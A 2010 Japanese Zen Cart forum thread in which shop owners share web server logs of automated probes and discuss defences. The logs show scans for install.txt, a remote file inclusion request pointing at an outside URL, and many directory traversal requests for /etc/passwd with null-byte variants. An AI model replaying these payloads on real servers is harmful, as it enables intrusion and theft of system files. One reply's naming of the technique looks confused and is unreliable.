新たな自動攻撃のターゲット探しでしょうか?

上記のジャンルにあてはまらない話題、雑談など
アバター
masatoshi

新たな自動攻撃のターゲット探しでしょうか?

投稿記事by masatoshi » 2010/2/12 20:37

最近サーバーのログを見ていると、数日の間に以下の様なアクセスが数回あってました。
利用状況やインストール状況の統計を取っているのか・・・?
はたまたセキュリティーをついた自動攻撃の準備なのか・・・?
とりあえず「install.txt」のファイルは削除しましたが。
みなさん、お気をつけ下さい。
------------------- log ------

58.177.209.216 - - [12/Feb/2010:18:22:53 +0900] "GET HTTP/1.1 HTTP/1.1" 400 348 "-" "Toata dragostea mea pentru diavola"
58.177.209.216 - - [12/Feb/2010:18:22:53 +0900] "GET /install.txt HTTP/1.1" 404 290 "-" "Toata dragostea mea pentru diavola"
58.177.209.216 - - [12/Feb/2010:18:22:54 +0900] "GET /cart/install.txt HTTP/1.1" 404 295 "-" "Toata dragostea mea pentru diavola"
58.177.209.216 - - [12/Feb/2010:18:22:54 +0900] "GET /zencart/install.txt HTTP/1.1" 404 298 "-" "Toata dragostea mea pentru diavola"
58.177.209.216 - - [12/Feb/2010:18:22:54 +0900] "GET /zen-cart/install.txt HTTP/1.1" 404 299 "-" "Toata dragostea mea pentru diavola"
58.177.209.216 - - [12/Feb/2010:18:22:54 +0900] "GET /zen/install.txt HTTP/1.1" 404 294 "-" "Toata dragostea mea pentru diavola"
58.177.209.216 - - [12/Feb/2010:18:22:54 +0900] "GET /shop/install.txt HTTP/1.1" 404 295 "-" "Toata dragostea mea pentru diavola"
58.177.209.216 - - [12/Feb/2010:18:22:54 +0900] "GET /butik/install.txt HTTP/1.1" 404 296 "-" "Toata dragostea mea pentru diavola"
58.177.209.216 - - [12/Feb/2010:18:22:55 +0900] "GET /zcart/install.txt HTTP/1.1" 404 296 "-" "Toata dragostea mea pentru diavola"
58.177.209.216 - - [12/Feb/2010:18:22:55 +0900] "GET /shop2/install.txt HTTP/1.1" 404 296 "-" "Toata dragostea mea pentru diavola"
58.177.209.216 - - [12/Feb/2010:18:22:55 +0900] "GET /catalog/install.txt HTTP/1.1" 404 298 "-" "Toata dragostea mea pentru diavola"
58.177.209.216 - - [12/Feb/2010:18:22:55 +0900] "GET /boutique/install.txt HTTP/1.1" 404 299 "-" "Toata dragostea mea pentru diavola"
58.177.209.216 - - [12/Feb/2010:18:22:55 +0900] "GET /cart/install.txt HTTP/1.1" 404 295 "-" "Toata dragostea mea pentru diavola"
58.177.209.216 - - [12/Feb/2010:18:22:55 +0900] "GET /store/install.txt HTTP/1.1" 404 296 "-" "Toata dragostea mea pentru diavola"
アバター
kimono
記事: 1995
登録日時: 2005/9/27 13:30
お住まい: 大阪府大阪市天王寺区上本町
連絡を取る:

Re: 新たな自動攻撃のターゲット探しでしょうか?

投稿記事by kimono » 2010/2/12 20:59

こんにちわ。kimonoです :)

情報大変ありがとうございます^^
まだどんなのか分かりませんが、うちも消しておきましょう。
アバター
masatoshi

Re: 新たな自動攻撃のターゲット探しでしょうか?

投稿記事by masatoshi » 2010/2/24 20:12

今度は、このようなアクセスが・・・

-------------------

210.166.221.249 - - [24/Feb/2010:18:33:39 +0900] "GET /store/index.php?main_page=http://twdplus-international.com/a/onodin/s? HTTP/1.0" 200 28602 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:39 +0900] "GET /store/index.php?main_page=|w| HTTP/1.0" 200 28785 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:40 +0900] "GET /store/index.php?main_page=|w HTTP/1.0" 200 29196 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:40 +0900] "GET /store/index.php?main_page=w| HTTP/1.0" 200 28915 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:40 +0900] "GET /store/index.php?main_page=/etc/passwd HTTP/1.0" 200 29237 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:40 +0900] "GET /store/index.php?main_page=../etc/passwd HTTP/1.0" 200 28963 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:41 +0900] "GET /store/index.php?main_page=../../etc/passwd HTTP/1.0" 200 29248 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:41 +0900] "GET /store/index.php?main_page=../../../etc/passwd HTTP/1.0" 200 28859 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:41 +0900] "GET /store/index.php?main_page=../../../../etc/passwd HTTP/1.0" 200 28918 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:42 +0900] "GET /store/index.php?main_page=../../../../../etc/passwd HTTP/1.0" 200 29333 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:42 +0900] "GET /store/index.php?main_page=../../../../../../etc/passwd HTTP/1.0" 200 29488 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:42 +0900] "GET /store/index.php?main_page=../../../../../../../etc/passwd HTTP/1.0" 200 28862 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:42 +0900] "GET /store/index.php?main_page=../../../../../../../../etc/passwd HTTP/1.0" 200 29054 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:42 +0900] "GET /store/index.php?main_page=../../../../../../../../../etc/passwd HTTP/1.0" 200 28690 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:43 +0900] "GET /store/index.php?main_page=../../../../../../../../../../etc/passwd HTTP/1.0" 200 28625 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:43 +0900] "GET /store/index.php?main_page=../../../../../../../../../../../etc/passwd HTTP/1.0" 200 28799 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:43 +0900] "GET /store/index.php?main_page=../../../../../../../../../../../../etc/passwd HTTP/1.0" 200 29012 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:43 +0900] "GET /store/index.php?main_page=../../../../../../../../../../../../../etc/passwd HTTP/1.0" 200 29289 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:44 +0900] "GET /store/index.php?main_page=/etc/passwd%00 HTTP/1.0" 200 28695 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:44 +0900] "GET /store/index.php?main_page=../etc/passwd%00 HTTP/1.0" 200 28543 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:44 +0900] "GET /store/index.php?main_page=../../etc/passwd%00 HTTP/1.0" 200 29227 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:44 +0900] "GET /store/index.php?main_page=../../../etc/passwd%00 HTTP/1.0" 200 28829 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:45 +0900] "GET /store/index.php?main_page=../../../../etc/passwd%00 HTTP/1.0" 200 29131 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:45 +0900] "GET /store/index.php?main_page=../../../../../etc/passwd%00 HTTP/1.0" 200 28840 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:45 +0900] "GET /store/index.php?main_page=../../../../../../etc/passwd%00 HTTP/1.0" 200 29143 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:45 +0900] "GET /store/index.php?main_page=../../../../../../../etc/passwd%00 HTTP/1.0" 200 28480 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:46 +0900] "GET /store/index.php?main_page=../../../../../../../../etc/passwd%00 HTTP/1.0" 200 28544 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:46 +0900] "GET /store/index.php?main_page=../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 28774 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:46 +0900] "GET /store/index.php?main_page=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 28711 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:46 +0900] "GET /store/index.php?main_page=../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 28485 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:46 +0900] "GET /store/index.php?main_page=../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 28715 "-" "Mozilla/5.0"
アバター
@電材
記事: 157
登録日時: 2009/7/11 00:56
お住まい: 大阪府
連絡を取る:

Re: 新たな自動攻撃のターゲット探しでしょうか?

投稿記事by @電材 » 2010/2/25 21:56

びびりますね。
ディレクトリトラバーサルというらしいです。ググればいろいろ出てきます。

ちなみに「Toata dragostea mea pentru diavola」は「悪魔のすべての私の愛」という意味らしいです。
こういうメッセージをUAに残すなんて粋にも思えますが、びびりますよね。
RoundCubeと呼ばれる手法のようです。
単なる趣味のサイトhttp://zairyo.ne.jp
アバター
masatoshi

Re: 新たな自動攻撃のターゲット探しでしょうか?

投稿記事by masatoshi » 2010/2/26 02:38

はい・・・困ったもんです(^^;

ついでに、ちょいとびびります。

サーバー側で怪しいアクセスを速やかに検知して対処してくれる画期的な仕組みが早く出来ないものでしょうかね?。
アバター
@電材
記事: 157
登録日時: 2009/7/11 00:56
お住まい: 大阪府
連絡を取る:

Re: 新たな自動攻撃のターゲット探しでしょうか?

投稿記事by @電材 » 2010/3/06 13:44

WEBサーバー側での検知
Webアプリケーションファイアウォールというものに辿りつきました。
導入費も結構なものでしょうね。

理論的には例外処理等で回避出来る手もあるみたいですが、サーバー側が乗っ取られたら論外ですよね。
googleがサイバー攻撃でたじたじしてしまう世の中ですし、ある意味、覚悟。
ユーザーには出来る限り迷惑をかけないように努めるにはどうすればいいのかなと考えてみます(苦笑)
単なる趣味のサイトhttp://zairyo.ne.jp

“Zen Cart 雑談処「禅亭」” へ戻る